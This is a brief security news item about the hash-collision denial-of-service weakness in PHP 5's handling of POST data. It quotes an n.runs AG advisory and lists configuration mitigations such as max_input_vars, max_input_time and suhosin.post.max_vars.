Researchers showed that some programing language implementations didn’t sufficiently randomize their hash functions or provide means to limit key collision attacks. Among the ones affected by this issue is PHP 5.
“PHP 5 uses the DJBX33A (Dan Bernstein's times 33, addition) hash function and parses POST form data into the $_POST hash table. Because of the structure of the hash function, it is vulnerable to an equivalent substring attack,” reads the n.runs AG
advisory.
The PHP Group didn’t release an official statement regarding the issue, but PHP 5.4.0 RC4 adds a max_input_vars directive to help mitigate hash collision attacks. However, this release is not stable.
Until the vendor responds, users are advised to limit the CPU time that a request is allowed to take by configuring the
max_input_time parameter. Another way to mitigate an attack is to limit the maximal
POST size.
Those who use
Suhosin, the open source patch for PHP that comes with some security improvements, can use
suhosin.post.max_vars to define the maximum number of variables that may be registered through a POST request.
Other web programing languages and applications are also susceptible to a similar DoS attack.
Learn how this is possible.
PHP 5.3.8 / 5.4.0 RC4 is available for download
here.
Find us on Google+
